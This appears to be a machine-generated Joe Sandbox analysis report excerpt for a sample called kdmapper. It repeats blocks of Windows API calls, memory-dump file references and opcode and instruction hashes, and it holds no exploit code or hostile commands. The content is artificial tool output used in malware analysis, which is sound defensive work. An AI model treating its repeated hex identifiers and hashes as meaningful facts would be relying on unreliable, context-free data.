                                                                                                                                                                          • Instruction Fuzzy Hash: 3711C433A802257FDF25DF98DC8099A7397AF84361B1A4220FD15AB394D631DD01C7D2
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                                                          • Opcode ID: 0d6b250403c31812659d00359d667ae1899fefd66a02b0cd85b87d29c8870403
                                                                                                                                                                          • Instruction ID: 6ef8ee0482d9f18126ad2fd6fccef627532ff64e8392d2089a15d7ecbb3b5982
                                                                                                                                                                          • Opcode Fuzzy Hash: 0d6b250403c31812659d00359d667ae1899fefd66a02b0cd85b87d29c8870403
                                                                                                                                                                          • Instruction Fuzzy Hash: CE018633911D34EBCF15ABA8DC419DEB733AFD9740F014129E812BB251DA34CE148AB4
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00643C3F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 190572456-0
                                                                                                                                                                          • Opcode ID: a15e3e54189fde8ba19ee39026ac2dd5c46068b764bb79393cb809bed74ab66c
                                                                                                                                                                          • Instruction ID: 1c5ba12ee7e0c2a4ccec4b4e217abaf950a39252b88eab3810f49076a905772e
                                                                                                                                                                          • Opcode Fuzzy Hash: a15e3e54189fde8ba19ee39026ac2dd5c46068b764bb79393cb809bed74ab66c
                                                                                                                                                                          • Instruction Fuzzy Hash: E5F0A0362002369F8F119EA8EC40ADA77ABEF11B617104124FA15E7390DB31EA20C7D0
                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0064CA2C,00000000,?,00646CBE,?,00000008,?,006491E0,?,?,?), ref: 00648E38
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                          • Opcode ID: f23f388022b9cb186604784914cfacd3faad114163be56c2c9c0788fdce80acc
                                                                                                                                                                          • Instruction ID: 9b3721d228f22804fa4d47f95ec8adad459ba1869d5ea6dd5ff38e3a5eaedc04
                                                                                                                                                                          • Opcode Fuzzy Hash: f23f388022b9cb186604784914cfacd3faad114163be56c2c9c0788fdce80acc
                                                                                                                                                                          • Instruction Fuzzy Hash: 87E092312062266FEBB127759C05BDF7A4B9F81BB8F150125BC1997291DF21CD0182F5
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00625AC2
                                                                                                                                                                            • Part of subcall function 0062B505: __EH_prolog.LIBCMT ref: 0062B50A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                                                          • Opcode ID: c9bbad0019177c8467de55e0680e4893bd682e7f35b495520e0976eb2e5ad205
                                                                                                                                                                          • Instruction ID: 5f5162c9fe60923071aac4d4590ecdd4477191387251b909fc844fde043dae4a
                                                                                                                                                                          • Opcode Fuzzy Hash: c9bbad0019177c8467de55e0680e4893bd682e7f35b495520e0976eb2e5ad205
                                                                                                                                                                          • Instruction Fuzzy Hash: E2018C30910690DAE725EBB8C4627DEFBA5DF69304F50848DA45663282CBB41B08DBA6
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0062A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0062A592,000000FF,?,?), ref: 0062A6C4
                                                                                                                                                                            • Part of subcall function 0062A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0062A592,000000FF,?,?), ref: 0062A6F2
                                                                                                                                                                            • Part of subcall function 0062A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0062A592,000000FF,?,?), ref: 0062A6FE
                                                                                                                                                                          • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0062A598
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1464966427-0
                                                                                                                                                                          • Opcode ID: bbd8805b58b0684319cd28bd2410898a6766bcc5538828c5d386fb9342a9a5cf
                                                                                                                                                                          • Instruction ID: badf71e79f6969071669e9082b7e6cbd8707432ae7f5037c4b20219762160985
                                                                                                                                                                          • Opcode Fuzzy Hash: bbd8805b58b0684319cd28bd2410898a6766bcc5538828c5d386fb9342a9a5cf
                                                                                                                                                                          • Instruction Fuzzy Hash: EAF05431009BA0ABCB6257F459047C77B925F15361F048A4DF1F9521D6C3A550959F23
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetThreadExecutionState.KERNEL32(00000001), ref: 00630E3D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExecutionStateThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2211380416-0
                                                                                                                                                                          • Opcode ID: 5fb91c4beb53213e6e0cebdb255dc2806afc33718757948657ab7dcc89e3eb0f
                                                                                                                                                                          • Instruction ID: 887ceaa34e876d5356da64b02f558e126f7aa96c3fa3231d09c5202d29245dfc
                                                                                                                                                                          • Opcode Fuzzy Hash: 5fb91c4beb53213e6e0cebdb255dc2806afc33718757948657ab7dcc89e3eb0f
                                                                                                                                                                          • Instruction Fuzzy Hash: 60D0121170116556EF517728A8657FE290B8FC7351F0D0469F1465F393CE544886A2E5
                                                                                                                                                                          APIs
                                                                                                                                                                          • GdipAlloc.GDIPLUS(00000010), ref: 0063A62C
                                                                                                                                                                            • Part of subcall function 0063A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0063A3DA
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1915507550-0
                                                                                                                                                                          • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                                                                          • Instruction ID: 7e307e9bff5ca53119817a5f650a9f78ea582141537da4dd5bdd77f5c67aa100
                                                                                                                                                                          • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                                                                          • Instruction Fuzzy Hash: 0CD0C77121420976DF426BA18D1396E7597EB01340F048125B8C2D5191EAB1DD10B5E6
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00631B3E), ref: 0063DD92
                                                                                                                                                                            • Part of subcall function 0063B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0063B579
                                                                                                                                                                            • Part of subcall function 0063B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0063B58A
                                                                                                                                                                            • Part of subcall function 0063B568: IsDialogMessageW.USER32(000303EC,?), ref: 0063B59E
                                                                                                                                                                            • Part of subcall function 0063B568: TranslateMessage.USER32(?), ref: 0063B5AC
                                                                                                                                                                            • Part of subcall function 0063B568: DispatchMessageW.USER32(?), ref: 0063B5B6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 897784432-0
                                                                                                                                                                          • Opcode ID: 4f0759327ae823478f17ee14162678cfa78d1f439a2b97cd9472ad6d6d0c4b6a
                                                                                                                                                                          • Instruction ID: 04d19d301537cf7301a6ed898b808c68999f2579cb2c70ea395b1d41665e06f9
                                                                                                                                                                          • Opcode Fuzzy Hash: 4f0759327ae823478f17ee14162678cfa78d1f439a2b97cd9472ad6d6d0c4b6a
                                                                                                                                                                          • Instruction Fuzzy Hash: 07D09E31144300BAD7012B51CD06F0B7AE3AB88F04F005658B384740B18AB29E21DB16
                                                                                                                                                                          APIs
                                                                                                                                                                          • DloadProtectSection.DELAYIMP ref: 0063E5E3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DloadProtectSection
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2203082970-0
                                                                                                                                                                          • Opcode ID: 2415c36b66acde6806736935f436a4deea20af10506cb1d922b09be94b4045f4
                                                                                                                                                                          • Instruction ID: f57676e00c5dbf3205ed623f0dd52d8ee9d3b82bb7630131540a6183c3b28ca7
                                                                                                                                                                          • Opcode Fuzzy Hash: 2415c36b66acde6806736935f436a4deea20af10506cb1d922b09be94b4045f4
                                                                                                                                                                          • Instruction Fuzzy Hash: CED0A9B0080280ABC301EBA8D847784326BB322710FC02204B105891E1CB6B4182C7A9
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileType.KERNELBASE(000000FF,006297BE), ref: 006298C8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileType
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3081899298-0
                                                                                                                                                                          • Opcode ID: 9373c108e2731f63d9a8df9e3299add35feaa8d6cad0d338b87327cf4ae2fc46
                                                                                                                                                                          • Instruction ID: 017eee5f9031377115772ceab8a5cb4e2126d25361fc31e4d315d4eb7cd64978
                                                                                                                                                                          • Opcode Fuzzy Hash: 9373c108e2731f63d9a8df9e3299add35feaa8d6cad0d338b87327cf4ae2fc46
                                                                                                                                                                          • Instruction Fuzzy Hash: 45C01234400615858E248634A8440D57313AA937B6FB89B94C028852E1C326CC47EE21
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063EAF9
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 58ca444cb110c77fa37d0b4505223790d950264be9b62d1266b77be9aa131de8
                                                                                                                                                                          • Instruction ID: 0fd44baf925268bfce31ffecbadd2a723389c7a91027fe98f77f14eaac2ab3d6
                                                                                                                                                                          • Opcode Fuzzy Hash: 58ca444cb110c77fa37d0b4505223790d950264be9b62d1266b77be9aa131de8
                                                                                                                                                                          • Instruction Fuzzy Hash: 2FB012C629A152BC350472001D02C37010FC0C0FA1B30812EF801C80C1DC820D0705B1
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E3FC
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: ec2760fd349479c7cb576448f7dce138e98d924d1c97996d4bbd673e00c01479
                                                                                                                                                                          • Instruction ID: 324ea33ab9e54ee22d901cbf8a504fc7ce6d1118cf62c5a3b99e76cef47799b8
                                                                                                                                                                          • Opcode Fuzzy Hash: ec2760fd349479c7cb576448f7dce138e98d924d1c97996d4bbd673e00c01479
                                                                                                                                                                          • Instruction Fuzzy Hash: 9BB012E125C110FC3144A1041C02C37028FC0C0F21B30C12EFC05E11C0D8414D0A06B3
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E3FC
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: 9a5cc2f0c0a799d992ccbdc2e8e353307736b10b23e353235a8fe83e123c02ac
                                                                                                                                                                          • Instruction ID: 5d66e31446f1f79e1b9d56cd77a489b482d38351b74912fcfb3cff3f52c3c062
                                                                                                                                                                          • Opcode Fuzzy Hash: 9a5cc2f0c0a799d992ccbdc2e8e353307736b10b23e353235a8fe83e123c02ac
                                                                                                                                                                          • Instruction Fuzzy Hash: 60B012F125C110FC3144A1041C02C37028FC0C0F25B30812EFC05D11C0D8454F0605B3
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E3FC
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1269201914-0
                                                                                                                                                                          • Opcode ID: c474613d497b8e0d0dd6170ff0824ca76cd4e172d2e406d27ff5ec094daa97ef
                                                                                                                                                                          • Instruction ID: bff9f33e5045128fc51d6a587e5fa5ecd28a056f261bb2afd47804da6d038e74
                                                                                                                                                                          • Opcode Fuzzy Hash: c474613d497b8e0d0dd6170ff0824ca76cd4e172d2e406d27ff5ec094daa97ef
                                                                                                                                                                          • Instruction Fuzzy Hash: 4FB012E125C110BC314461041D02C37028FC0C0F21B30C12EF905E51C0D8420D0F06B3
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E3FC
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
